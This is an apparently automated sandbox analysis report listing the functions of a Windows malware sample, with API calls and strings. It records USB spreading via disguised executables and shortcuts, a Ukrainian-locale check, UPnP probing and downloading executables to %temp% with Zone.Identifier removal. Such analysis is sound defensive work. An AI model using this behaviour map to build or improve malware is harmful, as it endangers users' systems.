lstrcmpiW 93->97 94->93 95->75 100 406a46 96->100 101 406a4b-406a5c 96->101 98 406a30-406a37 97->98 99 406a2e 97->99 98->96 99->94 100->92 102 406a6d-406a74 101->102 103 406a5e-406a67 101->103 104 406ae4-406aed 102->104 105 406a76-406a93 PathMatchSpecW 102->105 103->102 106 406af4-406b03 PathFileExistsW 104->106 107 406aef 104->107 108 406a95 105->108 109 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 105->109 110 406b05 106->110 111 406b0a-406b5a wsprintfW * 2 106->111 107->92 108->103 109->104 110->92 112 406b74-406b84 MoveFileExW 111->112 113 406b5c-406b72 call 406570 111->113 112->92 113->92
                                                                    APIs
                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                    • wsprintfW.USER32 ref: 00406768
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                    • API String ID: 2467965697-1256475382
                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 599 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 600 4065c5-4065d9 lstrcmpW 599->600 601 40669f-4066a2 599->601 602 4065f1 600->602 603 4065db-4065ef lstrcmpW 600->603 605 40666c-406682 FindNextFileW 602->605 603->602 604 4065f3-40663c wsprintfW * 2 603->604 606 406656-406666 MoveFileExW 604->606 607 40663e-406654 call 406570 604->607 605->600 608 406688-406699 FindClose RemoveDirectoryW 605->608 606->605 607->605 608->601
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                    • wsprintfW.USER32 ref: 00406595
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                    • API String ID: 92872011-32713442
                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                    Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                    • htons.WS2_32(?), ref: 00402101
                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1603358586-0
                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                    Function 0040D710 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                    • String ID: 239.255.255.250
                                                                    • API String ID: 726339449-2186272203
                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                    Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                    • htons.WS2_32(?), ref: 00401508
                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                    • String ID:
                                                                    • API String ID: 4174406920-0
                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                    Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                    • String ID:
                                                                    • API String ID: 107502007-0
                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    Strings
                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367
                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                    Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227filenetworksleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                    Download Yara Rule

